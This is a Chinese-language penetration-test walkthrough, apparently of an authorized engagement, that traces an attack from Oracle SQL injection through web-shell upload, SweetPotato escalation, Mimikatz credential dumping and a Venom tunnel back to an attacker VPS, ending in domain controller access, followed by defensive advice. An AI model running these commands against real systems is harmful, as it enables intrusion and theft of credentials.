从SQL注入到幸运域控
字数 1562 2025-08-15 21:32:54
从SQL注入到域控渗透实战教学文档
1. 渗透测试前期准备
1.1 目标信息收集
- 范围确认:明确授权测试范围(本例为2个域名+2个IP)
- 基础信息收集:
- 端口扫描(Nmap等工具)
- 网站敏感目录/文件扫描(DirBuster、Dirsearch等)
- Web应用指纹识别(WhatWeb、Wappalyzer等)
- 站点功能分析(手动浏览)
1.2 重点目标筛选
从收集信息中筛选关键点:
- 目录爆破发现的后台管理系统
- 存在可疑参数的页面
2. Web应用渗透阶段
2.1 后台管理系统测试
- 暴力破解测试:
- 手工尝试常见弱口令
- 使用定制字典进行爆破(Burp Intruder等)
- 注入测试:
- 传统SQL注入尝试
- 结果:未发现有效漏洞
2.2 SQL注入漏洞利用
-
漏洞发现:
- 在xx参数位置测试SQL注入
- 观察到明显报错信息(Oracle数据库特有报错风格)
-
自动化工具利用:
sqlmap -u "目标URL" --risk=3 --level=5 --dbms=oracle- 确认Oracle数据库
- 枚举数据库结构
-
关键数据获取:
- 从数据库中提取后台管理员凭据
- 密码为加密形式,使用cmd5.com等平台解密
2.3 后台权限获取
- 使用解密后的凭据成功登录后台
- 检查后台功能模块,寻找上传点
3. 获取WebShell
3.1 文件上传漏洞利用
-
上传点测试:
- 封面图片上传功能
- 资质图片上传功能
-
绕过前端验证:
- 原始尝试:ASP马改为jpg后缀 → 失败
- 发现仅前端验证:
- 使用Burp拦截请求
- 修改文件后缀为ashx(或其他可执行后缀)
- 成功上传
-
WebShell连接:
- 获取上传文件路径
- 使用中国菜刀/蚁剑等工具连接
4. 内网横向移动
4.1 权限提升
-
环境确认:
whoami systeminfo- 当前权限:普通域用户
- 系统:Windows Server 2008 R2
-
甜土豆提权:
SweetPotato.exe- 成功获取SYSTEM权限
4.2 凭据获取
-
使用Mimikatz:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"- 获取NTLM哈希/明文密码
- 使用cmd5.com解密哈希
-
远程桌面连接:
- 使用获取的Administrator密码登录
- 确认服务器可通外网且为内网机器
4.3 内网代理建立
-
使用Venom搭建隧道:
- 服务端(VPS):
./admin -lport 6666 - 客户端(目标服务器):
agent.exe -rhost VPS_IP -rport 6666
- 服务端(VPS):
-
SOCKS代理设置:
socks 6767- 本地使用Proxifier配置代理
- 实现全局流量转发
5. 域环境渗透
5.1 域信息收集
-
域控制器枚举:
net group "Domain Controllers" /Domain- 发现3台域控制器(主备架构)
-
域管用户查询:
net group "Domain Admins" /Domain- 列出所有域管理员账户
5.2 域控登录尝试
-
密码复用测试:
- 使用之前获取的域管密码
- 尝试登录域控制器(xxx-DC)
-
成功访问域控:
- 确认域控权限获取
- 项目目标达成
6. 关键工具与技术总结
| 工具/技术 | 用途 | 备注 |
|---|---|---|
| SQLMap | Oracle注入利用 | 参数:--dbms=oracle |
| Burp Suite | 拦截修改上传请求 | 绕过前端验证 |
| Mimikatz | 凭据提取 | 需debug权限 |
| SweetPotato | Windows提权 | Server 2008 R2适用 |
| Venom | 内网代理 | 支持多节点管理 |
7. 防御建议
-
Web应用层:
- 参数化查询防止SQL注入
- 上传功能实施服务端验证
- 后台管理加强认证
-
系统层:
- 定期更换高权限账户密码
- 限制域管账户登录范围
- 启用LSA保护防凭据窃取
-
网络层:
- 部署WAF防护Web攻击
- 网络分段限制横向移动
- 监控异常代理行为
8. 学习要点
-
完整攻击链构建:
- 从外网Web漏洞到内网域控的完整路径
-
密码复用风险:
- 内网密码重复使用的危险性
-
权限维持技术:
- 代理通道建立方法
- 内网横向移动技术
-
工具组合使用:
- 各类工具在渗透各阶段的应用场景